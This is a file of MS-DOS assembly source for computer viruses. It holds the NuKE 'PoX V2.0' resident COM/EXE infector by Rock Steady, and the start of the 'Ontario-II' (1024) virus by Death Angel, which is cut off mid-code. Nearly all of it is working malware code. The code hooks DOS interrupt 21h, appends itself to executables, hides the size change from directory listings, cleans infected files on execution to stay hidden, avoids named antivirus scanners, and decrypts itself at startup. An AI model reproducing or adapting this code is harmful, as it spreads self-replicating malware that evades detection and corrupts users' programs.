;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                       Virus Begins Here...                               
;------------------------------------------------------------------------- 
init_virus:     call    doit_now                ;Doit VirusMan...          
doit_now:       pop     bp                      ;Not to Lose Track         
                sub     bp,106h                 ;Set our position          
                push    ax                      ;Save all the regesters    
                push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    si                                                 
                push    di                                                 
                push    bp                                                 
                push    es                                                 
                push    ds                                                 
                mov     ax,0abcdh               ;Are we resident Already?  
                int     21h                     ;***McAfee Scan String!    
                cmp     bx,0abcdh               ;Yupe... Quit Then...      
                je      exit_com                                           
                push    cs                      ;Get CS=DS                 
                pop     ds                                                 
                mov     cx,es                                              
                mov     ax,3521h                ;Sometimes tend to inter-  
                int     21h                     ;cept this Interrupt...    
                mov     word ptr cs:[int21+2][bp],es    ;Save the Int      
                mov     word ptr cs:[int21][bp],bx      ;Vector Table      
                dec     cx                      ;Get a new Memory block    
                mov     es,cx                   ;Put it Back to ES         
                mov     bx,es:mut1              ;Get TOM size              
                mov     dx,virus_size           ;Virus size in DX          
                mov     cl,4                    ;Shift 4 bits              
                shr     dx,cl                   ;Fast way to divide by 16  
                add     dx,4                    ;add 1 more para segment   
                mov     cx,es                   ;current MCB segment       
                sub     bx,dx                   ;sub virus_size from TOM   
                inc     cx                      ;put back right location   
                mov     es,cx                                              
                mov     ah,4ah                  ;Set_block                 
                int     21h                                                
                                                                           
                jc      exit_com                                           
                mov     ah,48h                  ;now allocate it           
                dec     dx                      ;number of para            
                mov     bx,dx                   ;                          
                int     21h                                                
                jc      exit_com                                           
                dec     ax                      ;get MCB                   
                mov     es,ax                                              
                mov     cx,8h                   ;Made DOS the owner of MCB 
                mov     es:mut2,cx              ;put it...                 
                sub     ax,0fh                  ;get TOM                   
                mov     di,mut3                 ;beginnig of our loc in mem
                mov     es,ax                   ;                          
                mov     si,bp                   ;delta pointer             
                add     si,offset init_virus    ;where to start            
                mov     cx,virus_size                                      
                cld                                                        
                repne   movsb                    ;move us                  
                                                                           
                mov     ax,2521h                ;Restore Int21 with ours   
                mov     dx,offset int21_handler ;Where it starts           
                push    es                                                 
                pop     ds                                                 
                int     21h                                                
exit_com:       push    cs                                                 
                pop     ds                                                 
                cmp     word ptr cs:[buffer][bp],5A4Dh                     
                je      exit_exe_file                                      
                mov     bx,offset buffer        ;Its a COM file restore    
                add     bx,bp                   ;First three Bytes...      
                mov     ax,[bx]                 ;Mov the Byte to AX        
                mov     word ptr ds:[100h],ax   ;First two bytes Restored  
                add     bx,2                    ;Get the next Byte         
                mov     al,[bx]                 ;Move the Byte to AL       
                mov     byte ptr ds:[102h],al   ;Restore the Last of 3b    
                pop     ds                                                 
                pop     es                                                 
                pop     bp                      ;Restore Regesters         
                pop     di                                                 
                pop     si                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                mov     ax,100h                 ;Jump Back to Beginning    
                push    ax                      ;Restores our IP (a CALL   
                retn                            ;Saves them, now we changed
command         db      "C:\COMMAND.COM",0                                 
                                                                           
exit_exe_file:  mov     bx,word ptr cs:[vir_cs][bp]     ;fix segment loc   
                mov     dx,cs                           ;                  
                sub     dx,bx                                              
                mov     ax,dx                                              
                add     ax,word ptr cs:[exe_cs][bp]     ;add it to our segs
                add     dx,word ptr cs:[exe_ss][bp]                        
                mov     bx,word ptr cs:[exe_ip][bp]                        
                mov     word ptr cs:[fuck_yeah][bp],bx                     
                mov     word ptr cs:[fuck_yeah+2][bp],ax                   
                mov     ax,word ptr cs:[exe_ip][bp]                        
                mov     word ptr cs:[Rock_fix1][bp],dx                     
                mov     word ptr cs:[Rock_fix2][bp],ax                     
                pop     ds                                                 
                pop     es                                                 
                pop     bp                                                 
                pop     di                                                 
                pop     si                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                db      0B8h                   ;nothing but MOV AX,XXXX    
Rock_Fix1:                                                                 
                dw      0                                                  
                cli                                                        
                mov     ss,ax                                              
                db      0BCh                   ;nothing but MOV SP,XXXX    
Rock_Fix2:                                                                 
                dw      0                                                  
                sti                                                        
                db      0EAh                    ;nothing but JMP XXXX:XXXX 
Fuck_yeah:                                                                 
                dd      0                                                  
int21           dd      ?                       ;Our Old Int21             
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                       Dir Handler                                        
;------------------------------------------------------------------------- 
old_dir:        call    calldos21               ;get FCB                   
                test    al,al                   ;error?                    
                jnz     old_out                 ;nope                      
                push    ax                                                 
                push    bx                                                 
                push    es                                                 
                mov     ah,51h                  ;get PSP                   
                int     21h                                                
                mov     es,bx                   ;                          
                cmp     bx,es:[16h]             ;                          
                jnz     not_infected                                       
                mov     bx,dx                                              
                mov     al,[bx]                                            
                push    ax                                                 
                mov     ah,2fh                                             
                int     21h                                                
                pop     ax                                                 
                inc     al                       ;Extended FCB?            
                jnz     fcb_okay                                           
                add     bx,7h                                              
fcb_okay:       mov     ax,es:[bx+17h]                                     
                and     ax,1fh                                             
                cmp     al,1eh                                             
                jnz     not_infected                                       
                and     byte ptr es:[bx+17h],0e0h       ;fix secs          
                sub     word ptr es:[bx+1dh],virus_size                    
                sbb     word ptr es:[bx+1fh],0                             
not_infected:   pop     es                                                 
                pop     bx                                                 
                pop     ax                                                 
old_out:        iret                                                       
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                       Int 21 Handler                                     
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
int21_handler:  cmp     ah,11h                                             
                je      old_dir                                            
                cmp     ah,12h                                             
                je      old_dir                                            
                cmp     ax,4b00h                ;File executed             
                je      dis_infect                                         
                cmp     ah,3dh                                             
                je      check_file                                         
                cmp     ah,3eh                                             
                je      check_file2                                        
                cmp     ax,0abcdh               ;Virus testing             
                jne     int21call                                          
                mov     bx,0abcdh                                          
int21call:      jmp     dword ptr cs:[int21]    ;Split...                  
                                                                           
check_file:     jmp     opening_file            ;Like a Charm              
check_file2:    jmp     closing_file                                       
dis_infect:     call    disinfect               ;EXE & COM okay            
dont_disinfect: push    dx                                                 
                pushf                                                      
                push    cs                                                 
                call    int21call                                          
                pop     dx                                                 
                                                                           
execute:        push    ax                                                 
                push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    ds                                                 
                                                                           
                push    ax                                                 
                push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    ds                                                 
                push    bp                                                 
                push    cs                                                 
                pop     ds                                                 
                mov     dx,offset command                                  
                mov     bp,0abcdh                                          
                jmp     command1                                           
command_ret:    pop     bp                                                 
                pop     ds                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                call    check_4_av                                         
                jc      exit1                                              
command1:       mov     ax,4300h                ;Get file Attribs          
                call    calldos21                                          
                jc      exit1                                              
                test    cl,1h                   ;Make sure there normal    
                jz      open_file               ;Okay there are            
                and     cl,0feh                 ;Nope, Fix them...         
                mov     ax,4301h                ;Save them now             
                call    calldos21                                          
                jc      exit                                               
open_file:      mov     ax,3D02h                                           
                call    calldos21                                          
exit1:          jc      exit                                               
                mov     bx,ax                   ;BX File handler           
                mov     ax,5700h                ;Get file TIME + DATE      
                Call    calldos21                                          
                mov     al,cl                                              
                or      cl,1fh                  ;Un mask Seconds           
                dec     cx                      ;60 seconds                
                xor     al,cl                   ;Is it 60 seconds?         
                jz      exit                    ;File already infected     
                push    cs                                                 
                pop     ds                                                 
                mov     word ptr ds:[old_time],cx       ;Save Time         
                mov     word ptr ds:[old_date],dx       ;Save Date         
                mov     ah,3Fh                                             
                mov     cx,1Bh                          ;Read first 1B     
                mov     dx,offset ds:[buffer]           ;into our Buffer   
                call    calldos21                                          
                jc      exit_now                        ;Error Split       
                mov     ax,4202h                        ;Move file pointer 
                xor     cx,cx                           ;to EOF File       
                xor     dx,dx                                              
                call    calldos21                                          
                jc      exit_now                        ;Error Split       
                cmp     word ptr ds:[buffer],5A4Dh      ;Is file an EXE?   
                je      exe_infect                      ;Infect EXE file   
                mov     cx,ax                                              
                sub     cx,3                            ;Set the JMP       
                mov     word ptr ds:[jump_address+1],cx                    
                call    infect_me                       ;Infect!           
                jc      exit                                               
                mov     ah,40h                          ;Write back the    
                mov     dx,offset jump_address                             
                mov     cx,3h                                              
                call    calldos21                                          
exit_now:                                                                  
                mov     cx,word ptr ds:[old_time]       ;Restore old time  
                mov     dx,word ptr ds:[old_date]       ;Restore Old date  
                mov  ax,5701h                                              
                call    calldos21                                          
                mov     ah,3Eh                                             
                call    calldos21                                          
exit:           cmp     bp,0abcdh                                          
                je      command2                                           
                pop     ds                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                iret                                                       
command2:       jmp     command_ret                                        
                                                                           
exe_infect:     mov     cx,word ptr cs:[buffer+20]                         
                mov     word ptr cs:[exe_ip],cx                            
                mov     cx,word ptr cs:[buffer+22]                         
                mov     word ptr cs:[exe_cs],cx                            
                mov     cx,word ptr cs:[buffer+16]                         
                mov     word ptr cs:[exe_sp],cx                            
                mov     cx,word ptr cs:[buffer+14]                         
                mov     word ptr cs:[exe_ss],cx                            
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                mov     word ptr cs:[vir_cs],dx                            
                push    ax                                                 
                push    dx                                                 
                call    infect_me                                          
                pop     dx                                                 
                pop     ax                                                 
                mov     word ptr cs:[buffer+22],dx                         
                mov     word ptr cs:[buffer+20],ax                         
                pop     dx                                                 
                pop     ax                                                 
                jc      exit                                               
                add     ax,virus_size                                      
                adc     dx,0                                               
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                add     ax,40h                                             
                mov     word ptr cs:[buffer+14],dx                         
                mov     word ptr cs:[buffer+16],ax                         
                pop     dx                                                 
                pop     ax                                                 
                push    bx                                                 
                push    cx                                                 
                mov     cl,7                                               
                shl     dx,cl                                              
                mov     bx,ax                                              
                mov     cl,9                                               
                shr     bx,cl                                              
                add     dx,bx                                              
                and     ax,1FFh                                            
                jz      outta_here                                         
                inc     dx                                                 
outta_here:     pop     cx                                                 
                pop     bx                                                 
                mov     word ptr cs:[buffer+2],ax                          
                mov     word ptr cs:[buffer+4],dx                          
                mov     ah,40h                                             
                mov     dx,offset ds:[buffer]                              
                mov     cx,20h                                             
                call    calldos21                                          
exit_exe:       jmp     exit_now                                           
rocko           endp                                                       
vir_cs          dw      0                                                  
exe_ip          dw      0                                                  
exe_cs          dw      0                                                  
exe_sp          dw      0                                                  
exe_ss          dw      0                                                  
exe_sz          dw      0                                                  
exe_rm          dw      0                                                  
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                   Opening File handle AX=3D                              
;------------------------------------------------------------------------- 
opening_file:   call    check_extension                                    
                jnc     open_fuck2                                         
                call    check_exten_exe                                    
                jnc     open_fuck2                                         
                jmp     dword ptr cs:[int21]                               
open_fuck2:     push    ax                                                 
                mov     ax,3d02h                                           
                call    calldos21                                          
                jnc     open_fuck1                                         
                pop     ax                                                 
                iret                                                       
open_fuck1:     push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    ds                                                 
                mov     bx,ax                                              
                mov     ax,5700h                                           
                call    calldos21                                          
                mov     al,cl                                              
                or      cl,1fh                                             
                dec     cx                      ;60 Seconds                
                xor     al,cl                                              
                jnz     opening_exit3                                      
                dec     cx                                                 
                mov     word ptr cs:[old_time],cx                          
                mov     word ptr cs:[old_date],dx                          
                mov     ax,4202h                ;Yes Pointer to EOF        
                xor     cx,cx                                              
                xor     dx,dx                                              
                call    calldos21                                          
                mov     cx,dx                                              
                mov     dx,ax                                              
                push    cx                                                 
                push    dx                                                 
                sub     dx,1Bh                  ;Get first 3 Bytes         
                sbb     cx,0                                               
                mov     ax,4200h                                           
                call    calldos21                                          
                push    cs                                                 
                pop     ds                                                 
                mov     ah,3fh                  ;Read them into Buffer     
                mov     cx,1Bh                                             
                mov     dx,offset buffer                                   
                call    calldos21                                          
                xor     cx,cx                   ;Goto Beginning of File    
                xor     dx,dx                                              
                mov     ax,4200h                                           
                call    calldos21                                          
                mov     ah,40h                  ;Write first three bytes   
                mov     dx,offset buffer                                   
                mov     cx,1Bh                                             
                cmp     word ptr cs:[buffer],5A4Dh                         
                je      open_exe_jmp                                       
                mov     cx,3h                                              
open_exe_jmp:   call    calldos21                                          
                pop     dx                      ;EOF - Virus_Size          
                pop     cx                      ;to get ORIGINAL File size 
                sub     dx,virus_size                                      
                sbb     cx,0                                               
                mov     ax,4200h                                           
                call    calldos21                                          
                mov     ah,40h                  ;Fix Bytes                 
                xor     cx,cx                                              
                call    calldos21                                          
                mov     cx,word ptr cs:[old_time]                          
                mov     dx,word ptr cs:[old_date]                          
                mov     ax,5701h                                           
                int     21h                                                
                mov     ah,3eh                  ;Close File                
                call    calldos21                                          
opening_exit3:  pop     ds                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                jmp     dword ptr cs:[int21]                               
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                   Closing File Handle INFECT it!                         
;------------------------------------------------------------------------- 
closing_file:   cmp     bx,0h                                              
                je      closing_bye                                        
                cmp     bx,5h                                              
                ja      close_cont                                         
closing_bye:    jmp     dword ptr cs:[int21]                               
                                                                           
close_cont:     push    ax                                                 
                push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    di                                                 
                push    ds                                                 
                push    es                                                 
                push    bp                                                 
                push    bx                                                 
                mov     ax,1220h                                           
                int     2fh                                                
                mov     ax,1216h                                           
                mov     bl,es:[di]                                         
                int     2fh                                                
                pop     bx                                                 
                add     di,0011h                                           
                mov     byte ptr es:[di-0fh],02h                           
                add     di,0017h                                           
                cmp     word ptr es:[di],'OC'                              
                jne     closing_next_try                                   
                cmp     byte ptr es:[di+2h],'M'                            
                jne     pre_exit                                           
                jmp     closing_cunt3                                      
closing_next_try:                                                          
                cmp     word ptr es:[di],'XE'                              
                jne     pre_exit                                           
                cmp     byte ptr es:[di+2h],'E'                            
                jne     pre_exit                                           
closing_cunt:   cmp     word ptr es:[di-8],'CS'                            
                jnz     closing_cunt1              ;SCAN                   
                cmp     word ptr es:[di-6],'NA'                            
                jz      pre_exit                                           
closing_cunt1:  cmp     word ptr es:[di-8],'-F'                            
                jnz     closing_cunt2              ;F-PROT                 
                cmp     word ptr es:[di-6],'RP'                            
                jz      pre_exit                                           
closing_cunt2:  cmp     word ptr es:[di-8],'LC'                            
                jnz     closing_cunt3                                      
                cmp     word ptr es:[di-6],'AE'    ;CLEAN                  
                jnz     closing_cunt3                                      
pre_exit:       jmp     closing_nogood                                     
closing_cunt3:  mov     ax,5700h                                           
                call    calldos21                                          
                                                                           
                mov     al,cl                                              
                or      cl,1fh                                             
                dec     cx                              ;60 Seconds        
                xor     al,cl                                              
                jz      closing_nogood                                     
                push    cs                                                 
                pop     ds                                                 
                mov     word ptr ds:[old_time],cx                          
                mov     word ptr ds:[old_date],dx                          
                mov     ax,4200h                                           
                xor     cx,cx                                              
                xor     dx,dx                                              
                call    calldos21                                          
                mov     ah,3fh                                             
                mov     cx,1Bh                                             
                mov     dx,offset buffer                                   
                call    calldos21                                          
                jc      closing_no_good                                    
                mov     ax,4202h                                           
                xor     cx,cx                                              
                xor     dx,dx                                              
                call    calldos21                                          
                jc      closing_no_good                                    
                cmp     word ptr ds:[buffer],5A4Dh                         
                je      closing_exe                                        
                mov     cx,ax                                              
                sub     cx,3h                                              
                mov     word ptr ds:[jump_address+1],cx                    
                call    infect_me                                          
                jc      closing_no_good                                    
                mov     ah,40h                                             
                mov     dx,offset jump_address                             
                mov     cx,3h                                              
                call    calldos21                                          
closing_no_good:                                                           
                mov     cx,word ptr ds:[old_time]                          
                mov     dx,word ptr ds:[old_date]                          
                mov     ax,5701h                                           
                call    calldos21                                          
closing_nogood: pop     bp                                                 
                pop     es                                                 
                pop     ds                                                 
                pop     di                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                jmp     dword ptr cs:[int21]                               
closing_exe:    mov     cx,word ptr cs:[buffer+20]                         
                mov     word ptr cs:[exe_ip],cx                            
                mov     cx,word ptr cs:[buffer+22]                         
                mov     word ptr cs:[exe_cs],cx                            
                mov     cx,word ptr cs:[buffer+16]                         
                mov     word ptr cs:[exe_sp],cx                            
                mov     cx,word ptr cs:[buffer+14]                         
                mov     word ptr cs:[exe_ss],cx                            
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                mov     word ptr cs:[vir_cs],dx                            
                push    ax                                                 
                push    dx                                                 
                call    infect_me                                          
                pop     dx                                                 
                pop     ax                                                 
                mov     word ptr cs:[buffer+22],dx                         
                mov     word ptr cs:[buffer+20],ax                         
                pop     dx                                                 
                pop     ax                                                 
                jc      closing_no_good                                    
                add     ax,virus_size                                      
                adc     dx,0                                               
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                add     ax,40h                                             
                mov     word ptr cs:[buffer+14],dx                         
                mov     word ptr cs:[buffer+16],ax                         
                pop     dx                                                 
                pop     ax                                                 
                push    bx                                                 
                push    cx                                                 
                mov     cl,7                                               
                shl     dx,cl                                              
                mov     bx,ax                                              
                mov     cl,9                                               
                shr     bx,cl                                              
                add     dx,bx                                              
                and     ax,1FFh                                            
                jz      close_split                                        
                inc     dx                                                 
close_split:    pop     cx                                                 
                pop     bx                                                 
                mov     word ptr cs:[buffer+2],ax                          
                mov     word ptr cs:[buffer+4],dx                          
                mov     ah,40h                                             
                mov     dx,offset ds:[buffer]                              
                mov     cx,20h                                             
                call    calldos21                                          
closing_over:   jmp     closing_no_good                                    
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                   Infection Routine...                                   
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
infect_me       proc                                                       
                mov     ah,40h                                             
                mov     dx,offset init_virus                               
                mov     cx,virus_size                                      
                call    calldos21                                          
                jc      exit_error                      ;Error Split       
                mov     ax,4200h                                           
                xor     cx,cx                           ;Pointer back to   
                xor     dx,dx                           ;top of file       
                call    calldos21                                          
                jc      exit_error                      ;Split Dude...     
                clc                                     ;Clear carry flag  
                ret                                                        
exit_error:                                                                
                stc                                     ;Set carry flag    
                ret                                                        
infect_me       endp                                                       
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;               DisInfection Routine for 4B                                
;------------------------------------------------------------------------- 
Disinfect       PROC                                                       
                push    ax                                                 
                push    bx                      ;Save them                 
                push    cx                                                 
                push    dx                                                 
                push    ds                                                 
                mov     ax,4300h                ;Get file Attribs          
                call    calldos21                                          
                test    cl,1h                   ;Test for Normal Attribs   
                jz      okay_dis                ;Yes, File can be opened   
                and     cl,0feh                 ;No, Set them to Normal    
                mov     ax,4301h                ;Save attribs to file      
                call    calldos21                                          
                jc      half_way                                           
okay_dis:       mov     ax,3d02h                ;File now can be opened    
                call    calldos21               ;Safely                    
                jc      half_way                                           
                mov     bx,ax                   ;Put File Handle in BX     
                mov     ax,5700h                ;Get File Time & Date      
                call    calldos21                                          
                mov     al,cl                   ;Check to see if infected  
                or      cl,1fh                  ;Unmask Seconds            
                dec     cx                      ;Test to see if 60 seconds 
                xor     al,cl                                              
                jnz     half_way                ;No, Quit File AIN'T       
                dec     cx                                                 
                mov     word ptr cs:[old_time],cx                          
                mov     word ptr cs:[old_date],dx                          
                mov     ax,4202h                ;Yes, file is infected     
                xor     cx,cx                   ;Goto the End of File      
                xor     dx,dx                                              
                call    calldos21                                          
                push    cs                                                 
                pop     ds                                                 
                mov     cx,dx                   ;Save Location into        
                mov     dx,ax                   ;CX:DX                     
                push    cx                      ;Push them for later use   
                push    dx                                                 
                sub     dx,1Bh                  ;Subtract file 1Bh from the
                sbb     cx,0                    ;End so you will find the  
                mov     ax,4200h                ;Original EXE header or    
                call    calldos21               ;First 3 bytes for COMs    
                mov     ah,3fh                  ;Read them into Buffer     
                mov     cx,1Bh                  ;Read all of the 1B bytes  
                mov     dx,offset buffer        ;Put them into our buffer  
                call    calldos21                                          
                jmp     half                                               
half_way:       jmp     end_dis                                            
half:           xor     cx,cx                   ;                          
                xor     dx,dx                   ;Goto the BEGINNING of file
                mov     ax,4200h                                           
                call    calldos21                                          
                mov     ah,40h                  ;Write first three bytes   
                mov     dx,offset buffer        ;from buffer to COM        
                mov     cx,1Bh                                             
                cmp     word ptr cs:[buffer],5A4Dh                         
                je      dis_exe_jmp                                        
                mov     cx,3h                                              
dis_exe_jmp:    call    calldos21                                          
                pop     dx                      ;Restore CX:DX which they  
                pop     cx                      ;to the End of FILE        
                sub     dx,virus_size           ;Remove Virus From the END 
                sbb     cx,0                    ;of the Orignal File       
                mov     ax,4200h                ;Get new EOF               
                call    calldos21                                          
                mov     ah,40h                  ;Write new EOF to File     
                xor     cx,cx                                              
                call    calldos21                                          
                mov     cx,word ptr cs:[old_time]                          
                mov     dx,word ptr cs:[old_date]                          
                mov     ax,5701h                                           
                call    calldos21                                          
                mov     ah,3eh                  ;Close File                
                call    calldos21                                          
end_dis:        pop     ds                                                 
                pop     dx                                                 
                pop     cx                      ;Restore 'em               
                pop     bx                                                 
                pop     ax                                                 
                ret                                                        
disinfect       ENDP                                                       
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;               Check File Extension DS:DX ASCIIZ                          
;--------------------------------------------------------------------------
Check_extension         PROC                                               
                push    si                                                 
                push    cx                                                 
                mov     si,dx                                              
                mov     cx,256h                                            
loop_me:        cmp     byte ptr ds:[si],2eh                               
                je      next_ok                                            
                inc     si                                                 
                loop    loop_me                                            
next_ok:        cmp     word ptr ds:[si+1],'OC'                            
                jne     next_1                                             
                cmp     byte ptr ds:[si+3],'M'                             
                je      good_file                                          
next_1:         cmp     word ptr ds:[si+1],'oc'                            
                jne     next_2                                             
                cmp     byte ptr ds:[si+3],'m'                             
                je      good_file                                          
next_2:         pop     cx                                                 
                pop     si                                                 
                stc                                                        
                ret                                                        
good_file:      pop     cx                                                 
                pop     si                                                 
                clc                                                        
                ret                                                        
Check_extension         ENDP                                               
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;               Check File Extension DS:DX ASCIIZ                          
;------------------------------------------------------------------------- 
Check_exten_exe         PROC                                               
                push    si                                                 
                push    cx                                                 
                mov     si,dx                                              
                mov     cx,256h                                            
loop_me_exe:    cmp     byte ptr ds:[si],2eh                               
                je      next_ok_exe                                        
                inc     si                                                 
                loop    loop_me_exe                                        
next_ok_exe:    cmp     word ptr ds:[si+1],'XE'                            
                jne     next_1_exe                                         
                cmp     byte ptr ds:[si+3],'E'                             
                je      good_file_exe                                      
next_1_exe:     cmp     word ptr ds:[si+1],'xe'                            
                jne     next_2_exe                                         
                cmp     byte ptr ds:[si+3],'e'                             
                je      good_file_exe                                      
next_2_exe:     pop     cx                                                 
                pop     si                                                 
                stc                                                        
                ret                                                        
good_file_exe:  pop     cx                                                 
                pop     si                                                 
                clc                                                        
                ret                                                        
Check_exten_exe         ENDP                                               
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                    Call Int_21h Okay                                     
;------------------------------------------------------------------------- 
calldos21        PROC                                                      
                pushf                                                      
                call    dword ptr cs:[int21]                               
                retn                                                       
calldos21        ENDP                                                      
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                    MultiPly                                              
;--------------------------------------------------------------------------
multiply         PROC                                                      
                push    bx                                                 
                push    cx                                                 
                mov     cl,0Ch                                             
                shl     dx,cl                                              
                xchg    bx,ax                                              
                mov     cl,4                                               
                shr     bx,cl                                              
                and     ax,0Fh                                             
                add     dx,bx                                              
                pop     cx                                                 
                pop     bx                                                 
                retn                                                       
multiply         ENDP                                                      
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;               Check for AV file... Like SCAN.EXE or F-PROT.EXE           
;------------------------------------------------------------------------- 
Check_4_av              PROC                                               
                push    si                                                 
                push    cx                                                 
                mov     si,dx                                              
                mov     cx,256h                                            
av:             cmp     byte ptr ds:[si],2eh                               
                je      av1                                                
                inc     si                                                 
                loop    av                                                 
av1:            cmp     word ptr ds:[si-2],'NA'                            
                jnz     av2                                                
                cmp     word ptr ds:[si-4],'CS'                            
                jz      fuck_av                                            
av2:            cmp     word ptr ds:[si-2],'NA'                            
                jnz     av3                                                
                cmp     word ptr ds:[si-4],'EL'                            
                jz      fuck_av                                            
av3:            cmp     word ptr ds:[si-2],'TO'                            
                jnz     not_av                                             
                cmp     word ptr ds:[si-4],'RP'                            
                jz      fuck_av                                            
not_av:         pop     cx                                                 
                pop     si                                                 
                clc                                                        
                ret                                                        
fuck_av:        pop     cx                                                 
                pop     si                                                 
                stc                                                        
                ret                                                        
Check_4_av              ENDP                                               
msg             db      "NuKE PoX V2.0 - Rock Steady"                      
old_time        dw      0                                                  
old_date        dw      0                                                  
file_handle     dw      0                                                  
jump_address    db      0E9h,90h,90h                                       
buffer          db      90h,0CDh,020h           ;\                         
                db      18h DUP (00)            ;-Make 1Bh Bytes           
last:                                                                      
seg_a           ends                                                       
          end  start                                                       
;==========================================================================
;========================================================================= 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
; 1024-SRC Virus (Ontario-II) by Death Angel                               
; ========                                                                 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
;                                                                          
;This VIRUS was only written as an experiment to see how far a computer    
;virus could go through development. This pariticular virus in its present 
;form WILL NOT do any damage to your data or go off bouncing a ball across 
;your screen or play Yankee Doddle, IT WILL ONLY infect programs.          
;                                                                          
; Virus Information:                                                       
;    Hides:   In upper RAM, requires 3K of memory.                         
;     Size:   1K (exactly when attached to either EXE or COM files)        
;       ID:   Seconds in date of file is set to 32 (impossible value)      
;             .COM files, the 4th byte is 'O'                              
;             .EXE files, the stack pointer is 0600h                       
;                                                                          
; Cover-Up:   If loaded with DEBUG, it will remove itself from memory.     
;             When doing a DIR, it will cover up the filesize increase.    
;                                                                          
;Notes:   Also infects on a file open if the file ends in COM,EXE or OVL   
;                                                                          
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Stack_Size      Equ     512+1                                              
                                                                           
Code    Segment Para    Public  'CODE'                                     
        Assume  Cs:Code, Ds:Code                                           
        Org     0000h                                                      
                                                                           
Jmpfar  Macro   addr                                                       
        db      0EAh                                                       
        dd      addr                                                       
Endm                                                                       
                                                                           
Callfar Macro   addr                                                       
        db      09Ah                                                       
        dd      addr                                                       
Endm                                                                       
                                                                           
Retfar  Macro   num                                                        
        db      0CAh                                                       
        dw      num                                                        
Endm                                                                       
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
; Do a loop to decode the rest of the virus.                               
                                                                           
Virus_Begin:                                                               
                                                                           
V00:    Mov     Bx, offset V05-V05_Back                                    
V04:    Mov     Cx, offset Start_Code-(offset V05-V05_Back)                
V01:    Mov     Al, 00h                                                    
V02:    Add     Byte ptr Cs:[Bx], Al                                       
V03:    Xor     Al, 00h                                                    
        Inc     Bx                                                         
        Loop    V02                                                        
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
V05_Back        Equ     0                                                  
                                                                           
V05:    Sub     Bx, offset Start_Code                                      
        Xchg    Ax, Cx                                                     
        Dec     Ax                                                         
        Int     21h                                                        
        Or      Al, Ah                                                     
        Je      Run_Prog                                                   
        Push    Ds                                                         
        Xor     Di, Di                                                     
        Mov     Ds, Di                                                     
        Lds     Ax, Dword ptr Ds:[21h*4]                                   
        Mov     Word ptr Cs:[Bx].Saved_21, Ax                              
        Mov     Word ptr Cs:[Bx].Saved_21+2, Ds                            
        Mov     Cx, Es                                                     
        Dec     Cx                                                         
        Mov     Ds, Cx                                                     
        Sub     Word ptr Ds:[Di+03h], 3072/16                              
        Mov     Ax, Word ptr Ds:[Di+12h]                                   
        Sub     Ax, 3072/16                                                
